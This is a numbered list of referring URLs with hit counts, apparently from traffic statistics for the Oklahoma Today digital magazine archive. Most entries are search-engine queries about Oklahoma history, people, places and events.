138http://search.earthlink.net/search?q=Wixhita+Mountains+Eater+Pagent&area=eart...2
139http://verden.abcsok.no/index.html?page=3&q=Heavener+Stone&cs=latin1&offset=2
140http://search.yahoo.com/search?p=oklahoma+today+magazine&fr=yfp-t-501-s&toggl...2
141http://libgooglem.library.okstate.edu/search?q=2006&site=OKToday&btnG=EPC+Sea...2
142http://www.whogaveit.com/productionList.asp?!=ACQUISITION2
143http://my.att.net/s/s.dll?num=10&spage=search%2Fresultshome1.htm&searchType=w...2
144http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GGLD,GGLD:2...2
145http://oklahomacity.cox.net/cci/search/google?_mode=view&_state=normal2
146http://libgooglem.library.okstate.edu/search?q=Concho+Hill&site=OKToday&btnG=...2
147http://my.att.net/s/s.dll?spage=search/resultshome1.htm&searchtype=web&startd...2
148http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4DMUS_enU...2
149http://libgooglem.library.okstate.edu/search?q=Clem+McSpadden&site=EPC&btnG=E...2
150http://search.earthlink.net/search?q=Hesser%2BReunion%2BStillwater%2BOklahoma...2
151http://search.aol.com/aol/search?query=kis++++done+++++buges&page=2&nt=SG2&do...2
152http://sads.myspace.com/index.cfm?fuseaction=advancedFind.results&searchtype=...2
153http://search.aol.com/aol/search?query=artist+or+photographer+of+western+art+...2
154http://www.google.nl/search?hl=nl&q=1971+last+passengerr+bartlesville+depot&b...2
155http://libgooglem.library.okstate.edu/search?q=fiber+optic&site=EPC&btnG=EPC+...2
156http://libgooglem.library.okstate.edu/search?q=arbuckle&site=OKToday&btnG=EPC...2
157http://libgooglem.library.okstate.edu/search?q=formation+flight&site=EPC&btnG...2
158http://libgooglem.library.okstate.edu/search?q=fashion++color++design&site=EP...2
159http://libgooglem.library.okstate.edu/search?q=fashion+design&site=EPC&btnG=E...2
160http://libgooglem.library.okstate.edu/search?q=durant+main+street&site=EPC&bt...2
161http://libgooglem.library.okstate.edu/search?q=internation+business&site=EPC&...2
162http://libgooglem.library.okstate.edu/search?q=indian+land++sold+texaco&site=...2
163http://www.google.pt/search?hl=pt-PT&q=serapbook&btnG=Pesquisa+do+Google&meta...2
164http://libgooglem.library.okstate.edu/search?q=germans&site=OKToday&btnG=EPC+...2
165http://libgooglem.library.okstate.edu/search?q=Southern+Cherokee+1967+Court&s...2
166http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS240U...2
167http://libgooglem.library.okstate.edu/search?q=cabins+by+the+lake&site=OKToda...2
168http://libgooglem.library.okstate.edu/search?q=bricktown&site=EPC&output=xml_...2
169http://libgooglem.library.okstate.edu/search?q=bed+and+breakfast+wilburton&si...2
170http://libgooglem.library.okstate.edu/search?q=bottom+lands+of+the+arkansas+r...2
171http://libgooglem.library.okstate.edu/search?q=bittercreek+newcomb&site=EPC&b...2
172http://libgooglem.library.okstate.edu/search?q=dalton+gang+hideout&site=EPC&b...2
173http://libgooglem.library.okstate.edu/search?q=carlberg&site=OKToday&btnG=EPC...2
174http://libgooglem.library.okstate.edu/search?q=azalea+festival&site=OKToday&b...2
175http://www.google.fr/search?hl=fr&q=moun+jo+daro%2C+pakistan&btnG=Recherche+G...2
176http://libgooglem.library.okstate.edu/search?q=bed+and+breakfast+2007&site=OK...2
177http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T5GGLL_enUS259U...2
178http://libgooglem.library.okstate.edu/search?q=KINKADE&site=EPC&btnG=EPC+Sear...2
179http://libgooglem.library.okstate.edu/search?q=pictures+of+goldsby&site=EPC&s...2
180http://libgooglem.library.okstate.edu/search?q=parades&site=EPC&sort=date%3AD...2
181http://libgooglem.library.okstate.edu/search?q=LEMASTER&site=EPC&btnG=EPC+Sea...2
182http://libgooglem.library.okstate.edu/search?q=Lowe+Runkle&site=EPC&btnG=EPC+...2
183http://libgooglem.library.okstate.edu/search?q=otto+gray&site=OKToday&btnG=EP...2
184http://libgooglem.library.okstate.edu/search?q=oklahoma+wineries&site=OKToday...2
185http://libgooglem.library.okstate.edu/search?q=recycle&site=EPC&sort=date%3AD...2
186http://libgooglem.library.okstate.edu/search?q=Kenton&site=OKToday&sort=date%...2
187http://libgooglem.library.okstate.edu/search?q=priestley&site=EPC&btnG=EPC+Se...2
188http://libgooglem.library.okstate.edu/search?q=prostitute&site=EPC&sort=date%...2
189http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=SUNA,SUNA:2005-5...2
190http://libgooglem.library.okstate.edu/search?q=Oreana&site=EPC&btnG=EPC+Searc...2
191http://libgooglem.library.okstate.edu/search?q=marjorie+goodnight&site=EPC&bt...2
192http://www.scroogle.org/cgi-bin/nbbw.cgi2
193http://libgooglem.library.okstate.edu/search?q=MAY+1956&site=OKToday&btnG=Sea...2
194http://libgooglem.library.okstate.edu/search?q=kimberly+mauck&site=OKToday&so...2
195http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGLR_enUS251U...2
196http://libgooglem.library.okstate.edu/search?q=oklahoma+civil+war+battles+pon...2
197http://libgooglem.library.okstate.edu/search?q=no+mans+land&site=EPC&btnG=EPC...2
198http://libgooglem.library.okstate.edu/search?q=MARCH+1956&site=OKToday&btnG=S...2
199http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBS_enUS229U...2
200http://libgooglem.library.okstate.edu/search?q=military&site=OKToday&btnG=EPC...2
201http://www.google.com/search?q=Twelve+Oaks+Restaurant+Edmond,+OK+Menu&hl=en&r...2
202http://www.google.com/search?hl=en&q=discoveryland+oklahoma+musical+vintage+p...2
203http://www.google.com/search?hl=en&q=chile+ike+rodeo+california+quarter+horse...2
204http://www.google.com/search?hl=en&q=haunted+satanta2
205http://www.google.com/search?hl=en&q=little+lewis+whirlwind+nature+school2
206http://www.google.com/search?hl=en&q=belo+cozad2
207http://www.google.com/search?hl=en&q=bit+by+bit+caretaker+oologah2
208http://www.google.com/search?hl=en&q=ambrosia+springs+fort+sill2
209http://www.google.com/search?hl=en&q=wetses2
210http://www.google.com/search?hl=en&q=sequoyah+indian+hogshooter2
211http://www.google.com/search?hl=en&q=wolfe+hogshooter+family+ok2
212http://www.google.com/search?hl=en&q=lynn+lugeanbeal2
213http://www.google.com/search?hl=en&q=off+the+rack+prom+dresses+in+mcalester%2...2
214http://www.google.com/search?hl=en&q=oklahoma+diners&btnG=Google+Search2
215http://www.google.com/search?hl=en&rls=HPIC%2CHPIC%3A2006-39%2CHPIC%3Aen&q=fr...2
216http://www.google.com/search?q=callery+chemical+at+muskogee,+ok&hl=en&rlz=1T4...2
217http://www.google.com/search?q=canton,+oklahoma+lake+overflow+project&hl=en&s...2
218http://www.google.com/search?q=cal+suggs&hl=en&start=20&sa=N2
219http://www.google.com/search?q=brummet+echohawk&hl=en&rls=GGLJ,GGLJ:2006-42,G...2
220http://www.google.com/search?q=directions+to+the+wichita+mountains+rock+rooms...2
221http://www.google.com/search?q=choctaw+county+industrial+sells+land+on+hugo+l...2
222http://www.google.com/search?hl=en&q=SOAP+BERRIES+OKLAHOMA&btnG=Search2
223http://www.google.com/search?hl=en&q=Rodeo%27s+in+month+of+March+or+April+in+...2
224http://www.google.com/search?q=art+of+riverside+indian+school,anadarko+oklaho...2
225http://www.google.com/search?q=broken+bow+ok.+nude+single+girls&hl=en&start=5...2
226http://www.google.com/search?hl=en&q=La+Boehm%27s+Sisters+of+the+Dark+Rose%2C...2
227http://www.google.com/search?hl=en&q=Max+Eggleston+and+Lake+Texoma&btnG=Searc...2
228http://www.google.com/search?hl=en&q=Fred+Grove+Watercolor&btnG=Search2
229http://www.google.com/search?q=%22Fred+Olds%22+%22Oklahoma%22&hl=en&lr=&rlz=1...2
230http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=fe...2
231http://www.google.com/search?q=+%22Goldie+Capers+Smith%22&hl=en&lr=&as_qdr=al...2
232http://www.google.com/search?q=1974+cameron+boat&rls=com.microsoft:en-us:IE-S...2
233http://www.google.com/search?hl=en&safe=active&q=how+did+Oklahoma+look+in+196...2
234http://www.google.com/search?hl=en&safe=strict&sa=X&oi=spell&resnum=0&ct=resu...2
235http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ok...2
236http://www.google.com/search?q=Ray+Hendley&hl=en&start=50&sa=N2
237http://www.google.com/search?q=Olympic+Wrestling+Clay+Roberts&hl=en&start=10&...2
238http://www.google.com/search?q=Dale+Robertsons+Haymaker+farm&rls=com.microsof...2
239http://www.google.com/search?q=Jacques+Hans+Gallrein&hl=en&ie=UTF-8&start=10&...2
240http://www.google.com/search?q=Leonardo%20da%20vinci%20museum%20in%20Enid,%20...2
241http://www.google.com/search?hl=en&rls=SUNA%2CSUNA%3A2006-27%2CSUNA%3Aen&q=Sp...2
242http://www.google.com/search?hl=en&rlz=1T4ADBS_en___US220&q=1960s-1964+day+dr...2
243http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us&q=fred+olds+in+o...2
244http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS252US253&sa=X&oi=spell&res...2
245http://www.google.com/search?hl=en&rlz=1T4GGIH_enUS260US261&q=eagle+pappan2
246http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-US&q=Brent+McCutche...2
247http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-US&q=smok+shak&btnG...2
248http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ci...2
249http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Po...2
250http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Pe...2
251http://www.google.com/search?hl=en&rlz=1T4GGLR_enUS207US208&q=Fred+Lowry+Lena...2
252http://www.google.com/search?hl=en&rlz=1T4SUNA_enUS227US227&q=what+did+early+...2
253http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Br...2
254http://www.blingo.com/search?q=gold+prospecting+otter+creek%2C+grand+lake+%2C...2
255http://www.google.com/search?q=perle+mesta+postage+stamp&hl=en&rlz=1G1GGLQ_EN...2
256http://www.google.com/search?q=perry+holly+midland+tx+wood+carver&hl=en&ie=UT...2
257http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...2
258http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...2
259http://www.google.com/search?q=phone+number+to+prayer+tower+at+ORU+in+Tulsa,+...2
260http://www.google.com/search?q=phleat+boyd+kansas+artist&rls=com.microsoft:en...2
261http://www.google.com.hk/search?complete=1&hl=zh-TW&client=firefox-a&rls=org....2
262http://www.google.com/custom?hl=en&client=pub-2456819124576563&channel=291803...2
263http://www.google.com/custom?hl=en&client=google-coop-np&cof=FORID:11%3BAH:le...2
264http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...2
265http://www.google.com/cse?cx=010261058857657618936%3Ar-w-bcuqapi&cof=FORID%3A...2
266http://www.google.com/custom?client=pub-2461159273465975&forid=1&ie=ISO-8859-...2
267http://www.google.com/custom?q=holy+city+of+ther+Wichita+mountains&sa=Search&...2
268http://www.google.ca/search?hl=en&safe=active&q=copeilia&btnG=Search&meta=2
269http://www.google.com/search?q=turner+falls,+ok+geology&hl=en&client=firefox-...2
270http://www.google.com/search?q=treatment+of+tuberculosis+at+Talihina+Indian+H...2
271http://www.google.co.id/search?hl=en&q=article+hobbies+collecting+coin+from+j...2
272http://www.google.com/search?source=ig&hl=en&rlz=&q=penfield+cowan&btnG=Googl...2
273http://www.google.com/search?source=ig&hl=en&rlz=&q=nutcracker+%2B+bartlesvil...2
274http://www.google.com.br/search?hl=pt-BR&rlz=1T4ADBS_pt-BRBR247BR247&sa=X&oi=...2
275http://www.google.com.br/search?hl=pt-BR&q=videos+ten+ropng&meta=&btnG=Pesqui...2
276http://www.google.com/search?q=pilar+capis+oratorical+piece&hl=en&rlz=1T4ADBF...2
277http://www.google.co.in/search?hl=en&q=join+lndan+air+aforce&btnG=Google+Sear...2
278http://www.google.co.th/search?hl=en&q=digital+library.okstate%2Cedu%2F%2Fokt...2
279http://www.google.co.uk/search?hl=en&q=Easter++stolry&btnG=Google+Search&meta...2
280http://www.google.com/search?hl=en&q=Elaine+Burkhardt+Tulsa+OK&btnG=Google+Se...2
281http://www.google.com/search?q=leon+senter+okmulgee&hl=en&rlz=1G1GGLQ_ENUS261...2
282http://www.google.com/search?q=oklahma+football&hl=en&start=20&sa=N2
283http://www.google.com/search?q=leon+cross+in+norman+ok&hl=en&rls=RNWE,RNWE:20...2
284http://www.google.com/search?hl=en&q=%22oklahoma+today%22+and+%22robert+a.+he...2
285http://www.google.com/search?hl=en&ned=us&q=engineer+who+has+invented+a+grain...2
286http://www.google.com/search?q=oklahoma+dancing+rabbit+class+rings&rls=com.mi...2
287http://www.google.com/search?hl=en&ie=ISO-8859-1&q=Junetta+Davis&btnG=Google+...2
288http://www.google.com/search?q=high+school+reunion+1974+bristow+oklahoma&hl=e...2
289http://www.google.com/search?q=how+does+a+ten+gauge+perform+for+turkey+huntin...2
290http://www.google.com/search?hl=en&q=1963+Oklahoma+City+University+Chiefs+bas...2
291http://www.google.com/search?q=jim+rowenhorst&hl=en&client=safari&rls=en&star...2
292http://www.google.com/search?hl=en&q=19th+Annual+American+Indian+Artists+Exhi...2
293http://www.google.com/hws/search?client=dell-usuk&adsafe=high&safe=high&chann...2
294http://www.google.com/search?client=safari&rls=en&q=Junetta+Davis&ie=UTF-8&oe...2
295http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aoffic...2
296http://www.google.com/search?client=safari&rls=en&q=Williamson+Coyle+Cherokee...2
297http://www.google.com/search?client=safari&rls=en-us&q=Junetta+Davis&ie=UTF-8...2
298http://www.google.com/hws/search?hl=en&client=dell-usuk-rel&channel=us-psp&ib...2
299http://www.google.com/hws/search?q=How+was+the+Rooster+Days+Festival+started+...2
300http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22frank+dobyns%22+and+edm...2
301http://www.google.com/search?hl=en&client=safari&rls=en-us&q=calendar+april+7...2
302http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla:en-US:off...2
303http://www.google.com/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla...2
304http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3...2
305http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla:en-US:off...2
306DELBY+FILSECLAB+FIREWALL+WWW.FILSECLAB.COM2
307http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...2
308http://digital.library.okstate.edu/oktoday/1960s/1966/oktdv16n1.pdf2
309http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
310http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
311http://digital.library.okstate.edu/oktoday/1980s/1988/oktdv38n4.pdf2
312http://digital.library.okstate.edu/oktoday/1980.html#1012
313http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...2
314http://libgooglem.library.okstate.edu/search?q=%22ethnic+groups%22&site=OKTod...2
315http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
316http://cattailtradingpost.com/misc.htm2
317http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...2
318http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
319http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
320http://64.233.169.104/search?q=cache:YLiOeHz56nMJ:digital.library.okstate.edu...2
321http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
322http://aolsearch.aol.com/aol/search?query=Frankoma+trivets&page=7&nt=SG3&text...2
323http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
324http://aolsearch.aol.com/aol/search?query=Doubleday+photographs+of+rodeo+cont...2
325http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
326http://libgooglem.library.okstate.edu/search?access=p&as_dt=i&sort=date%3AD%3...2
327http://aolsearch.aol.com/aol/search?query=baker+run+in+oil+windmill&page=3&nt...2
328http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
329http://aolsearch.aol.com/aol/search?encquery=c8e89afd64eb226166455f2f63facbce...2
330http://images.google.com/imgres?imgurl=http://digital.library.okstate.edu/okt...2
331http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...2
332http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...2
333http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...2
334http://arcade.verizon.net/search/gafs.htm?refid=gbar_2&q=fog%20%20%20clty%20%...2
335http://libgooglem.library.okstate.edu/search?q=+haikey&site=EPC&sort=date%3AD...2
336http://www.google.com/search?q=%22Calvin+Berry%22&hl=en&client=firefox-a&rls=...1
337http://www.google.com/search?q=%22Billy+Washington%22%2C+Indian+doctor&ie=utf...1
338http://www.google.com/search?q=%22Chicken+In+The+Rough%22&hl=en&start=240&sa=...1
339http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
340http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
341http://www.google.com/search?num=50&hl=en&newwindow=1&safe=off&q=%22Harry+Sin...1
342http://www.google.com/search?q=%22Bill+Burch%22+Scout&hl=en&client=firefox-a&...1
343http://www.google.com/search?num=50&hl=en&safe=off&q=where+at+mount+scott+okl...1
344http://www.google.com/search?q=alumni+richard+c+lemon&oi=navquery_searchbox&s...1
345http://www.google.com/search?q=%22Johnny+Lee+Wills%22&hl=en&start=70&sa=N1
346http://www.google.com/search?q=%22Life+Assurance%22+Oklahoma+%22First+Life+As...1
347http://www.google.com/search?q=%22Jim+Davis%22+Waurika&hl=en&client=firefox-a...1
348http://www.google.com/search?q=altus+oklahoma+1988+cotton+fire&hl=en&pwst=1&s...1
349http://www.google.com/search?q=%22GRDA%22+%22lobby%22&hl=en&start=20&sa=N1
350http://www.google.com/search?q=%22J.+D.+Haines,+M.D.%22&hl=en&start=10&sa=N&f...1
351http://www.google.com/search?q=%22James+H+Winchester%22+AR&hl=en1
352http://www.google.com/search?q=%22James+G.+Haizlip%22&hl=en&rls=GGGL,GGGL:200...1
353http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
354http://www.google.com/search?hl=fa&q=fat+ured+grls&lr=1
355http://www.google.com/search?q=anadarko+basin+drilling+1981&hl=en&rlz=1T4DKUS...1
356http://www.google.com/search?hl=es&lr=&sa=X&oi=spell&resnum=0&ct=result&cd=1&...1
357http://www.google.com/search?hl=it&client=pub-client&ie=ISO-8859-1&oe=ISO-885...1
358http://www.google.com/search?hl=xx-hacker&q=bolt+chain+elk+mt+%22wichita+mts%...1
359http://www.google.com/search?hl=en&safe=off&sa=X&oi=spell&resnum=0&ct=result&...1
360http://www.google.com/search?hl=en&safe=vss&q=%22rosebud+agate%221
361http://aolsearch.aol.com/aol/search?query=%22lee+m+rice%22&page=2&nt=null&inv...1
362http://www.google.com/search?num=20&hl=en&safe=off&client=firefox-a&channel=s...1
363http://www.google.com/search?num=100&hl=en&newwindow=1&rlz=1T4GGIH_enUS264US2...1
364http://www.google.com/search?num=100&hl=en&safe=off&sa=X&oi=spell&resnum=0&ct...1
365http://www.google.com/search?num=100&hl=en&as_qdr=all&lr=lang_en&sa=X&oi=spel...1
366http://www.google.com/search?num=20&hl=en&client=firefox-a&channel=s&rls=org....1
367http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=+aNGIE+cIRCUS+DINER+IN+HUGO+...1
368http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
369http://www.google.com/search?imgsz=small%7Cmedium%7Clarge%7Cxlarge&hl=en&q=tu...1
370http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=gi...1
371http://www.google.com/search?hl=en&safe=off&rlz=1G1GGLQ_ENUS261&q=Mohenjo-Dar...1
372http://www.google.com/search?q=%22medicine+springs%22+antlers+OK&hl=en&start=...1
373http://www.google.com/search?q=%22melvin+c+hall%22&hl=en&client=firefox-a&rls...1
374http://www.google.com/search?q=actlvlty+center&ie=utf-8&oe=utf-8&aq=t&rls=org...1
375http://www.google.com/search?q=%22pawnee+indian+school%22&hl=en&start=20&sa=N...1
376http://www.google.com/search?q=%22rock+city%22+clayton+oklahoma&hl=en&start=1...1
377http://www.google.com/search?q=%22marquis+de+cuevas%22&hl=en&client=firefox-a...1
378http://www.google.com/search?q=%22marquis+james%22+%22andrew+jackson%22+manus...1
379http://www.google.com/search?q=%22mavis+doering%22&hl=en&start=10&sa=N1
380http://www.google.com/search?q=all+paintings+on+archie+blackowl&hl=en&rlz=1G1...1
381http://www.google.com/search?q=%22ludwig+schermer%22&hl=en&rls=GGLG,GGLG:2006...1
382http://www.google.com/search?q=%2BOklahoma+%2Bcaves+%2BSeminole&hl=en&start=1...1
383http://www.google.com/search?q=%3CPierre+Charbonnet+%3E&hl=en&start=40&sa=N1
384http://www.google.com/search?q=%22western+state+hospital%22+supply+time+capsu...1
385http://www.google.com/search?q=abargi&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:...1
386http://www.google.com/search?q=%22slavery+in+Oklahoma%22&ie=utf-8&oe=utf-8&aq...1
387http://www.google.com/search?q=%22son+of+Black+Kettle%22&hl=en1
388http://www.google.com/search?q=%22university+of+oklahoma+press%22+%26+%22stev...1
389http://www.google.com/search?q=%22tom+arnn%22&rls=com.microsoft:*:IE-SearchBo...1
390http://www.google.com/search?q=%22Pawnee+Scout%22&hl=en&start=80&sa=N1
391http://www.google.com/search?q=%22Tulsa%22+%2B+%22spring+festival%22+%2B+Marc...1
392http://www.google.com/search?q=allen+long+cherokee+booger+mask&hl=en&start=10...1
393http://www.google.com/search?q=%22Tsa-La-Gi%22+locomotive&hl=en&start=10&sa=N...1
394http://www.google.com/search?q=%22Will+Rogers%22+portrait+and+AND+Charles+Ban...1
395http://www.google.com/search?q=%22barney+holland%22&hl=en&start=50&sa=N1
396http://www.google.com/search?q=%22Phleat+Boyd%22&hl=en&client=firefox-a&chann...1
397http://www.google.com/search?q=%22Terry+Zinn%22&hl=en&safe=off&start=30&sa=N1
398http://www.google.com/search?q=%22R.+L.+Rollins%22&hl=en&start=10&sa=N1
399http://www.google.com/search?q=%22kimberly+schmidt%22+pianist&hl=en&start=80&...1
400http://www.google.com/search?q=%22how+to+make%22+%22turkey+costume%22&hl=en&s...1
401http://www.google.com/search?q=%22john+gregory%22+sculptor+%27pioneer+woman%2...1
402http://www.google.com/search?q=%22home+comfort+stove%22+64&hl=en&start=10&sa=...1
403http://www.google.com/search?q=%22junetta+davis%22&ie=utf-8&oe=utf-8&aq=t&rls...1
404http://www.google.com/search?q=%22chip+on+shoulder%22+%2B+teens&hl=en&rls=SUN...1
405http://www.google.com/search?q=%22dale+coody%22&hl=en&start=20&sa=N1
406http://www.google.com/search?q=%22hickory%22+nut+oklahoma&hl=en&start=10&sa=N...1
407http://www.google.com/search?q=%22elizabeth+hahn%22+master+of+fine+arts&hl=en...1
408http://www.google.com/search?q=Williams+plaza+tulsa+oklahoma+and+ice+skate&rl...1
409http://www.google.com/search?hl=en&safe=active&q=+article+1967+oklahoma1
410http://www.google.com/search?hl=en&safe=active&q=Illinois+river+cresting+okla...1
411http://www.google.com/search?hl=en&safe=active&q=%22oklahoma+rising+sun%221
412http://www.google.com/search?hl=en&safe=active&q=JNEM+stimulates+what+ABCS+sy...1
413http://www.google.com/search?hl=en&safe=active&q=Kenwood+Indian+Reserve+ARea1
414http://www.google.com/search?hl=en&safe=active&ie=UTF-8&sa=X&oi=spell&resnum=...1
415http://www.google.com/search?hl=en&safe=active&q=%22calvin+berry%22+wood+carv...1
416http://www.google.com/search?hl=en&safe=active&q=%22archibald+mcleish%22+WWI+...1
417http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=wi...1
418http://www.google.com/search?hl=en&safe=active&q=eufaula%2Cok+hotels%2Bweddin...1
419http://www.google.com/search?hl=en&safe=active&q=famous+authors+fom+the+1980s...1
420http://www.google.com/search?hl=en&safe=active&q=dogwood+bus+tour+dates++tali...1
421http://aolsearch.aol.com/aol/search?query=Discovery+of+oil+in+the+nearby+vill...1
422http://www.google.com/search?hl=en&safe=active&q=Lawrie+Tatum%2Fquaker&btnG=S...1
423http://www.google.com/search?hl=en&safe=active&q=Poolaw+vs.+Bishop1
424http://www.google.com/search?hl=en&safe=active&q=comanche+medicine+monds+1
425http://www.google.com/search?hl=en&safe=active&q=bartlesville+ok+wealthy+town...1
426http://www.google.com/search?hl=en&safe=active&q=irvin+hurst1
427http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ok...1
428http://aolsearch.aol.com/aol/search?query=Fort+Chickamauga%2C+Oklahoma&invoca...1
429http://www.google.com/search?q=ardmore+easter+sunday+brunch+oklahoma&rls=com....1
430http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ok...1
431http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ot...1
432http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ni...1
433http://www.google.com/search?q=art+griffith&hl=en&safe=active&ie=UTF-8&start=...1
434http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=no...1
435http://www.google.com/search?q=antique+cowboy+spurs+adams+freight+co.&hl=en&p...1
436http://www.google.com/search?q=arbuckle+uplift+gold&sourceid=navclient-ff&ie=...1
437http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=tr...1
438http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=so...1
439http://www.google.com/search?q=apollo+soucek+died+1955&hl=en&safe=off&start=1...1
440http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=pi...1
441http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=pr...1
442http://www.google.com/search?q=archie+mason%27s+daughter+osage&hl=en&rls=GGIC...1
443http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ra...1
444http://www.google.com/search?hl=en&safe=off&rls=GGLR%2CGGLR%3A2006-24%2CGGLR%...1
445http://www.google.com/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%...1
446http://www.google.com/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%...1
447http://www.google.com/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%...1
448http://www.google.com/search?hl=en&safe=off&client=safari&rls=en&q=%22private...1
449http://www.google.com/search?hl=en&safe=off&client=safari&rls=en&q=delores+ch...1
450http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
451http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
452http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
453http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
454http://www.google.com/search?hl=en&safe=off&q=blazers+v.s+oilers+coverage&btn...1
455http://www.google.com/search?hl=en&safe=off&q=jenny+pue+pottery&btnG=Search1
456http://www.google.com/search?hl=en&safe=off&q=Christian+Boy+band+Oklahoma+198...1
457http://www.google.com/search?hl=en&safe=off&q=silka+deer+reproduction1
458http://www.google.com/search?hl=en&safe=off&ie=ISO-8859-1&q=%22Jim%2BLowe%22%...1
459http://www.google.com/search?hl=en&safe=off&q=%22Montee+Hoke%22+&um=1&ie=UTF-...1
460http://www.google.com/search?hl=en&safe=off&q=%2B%22lafarge%22+%2Bdefrocked%2...1
461http://www.google.com/search?hl=en&safe=off&q=%22harold+hartley%22+oklahoma&b...1
462http://www.google.com/search?hl=en&safe=active&q=lake+eufaula+%2B+wheat+farm1
463http://www.google.com/search?hl=en&safe=active&q=pistol+pete+veteran+of+the+o...1
464http://www.google.com/search?hl=en&safe=active&q=right+before+your+eyes+%28%2...1
465http://www.google.com/search?hl=en&safe=active&q=phils+silver+saddle+idabel+o...1
466http://www.google.com/search?hl=en&safe=active&q=what+city+did+ben+fraklin+de...1
467http://aolsearch.aol.com/aol/search?query=1961+oklahoma+bowling&page=3&nt=nul...1
468http://www.google.com/search?hl=en&safe=active&q=nancy+hufschmid+oklahoma1
469http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
470http://www.google.com/search?hl=en&safe=active&q=oklahoma+legal+drinking+age+...1
471http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
472http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
473http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
474http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
475http://www.google.com/search?hl=en&safe=active&sa=X&oi=spell&resnum=0&ct=resu...1
476http://www.google.com/search?hl=en&safe=active&q=winter+of+1968+in+Great+Fall...1
477http://www.google.com/search?hl=en&safe=active&rls=GGLD,GGLD:2006-28,GGLD:en&...1
478http://www.google.com/search?hl=en&safe=active&rlz=1G1GGLQ_ENUS266&q=Shalah+R...1
479http://www.google.com/search?hl=en&safe=active&rls=com.microsoft:*:IE-SearchB...1
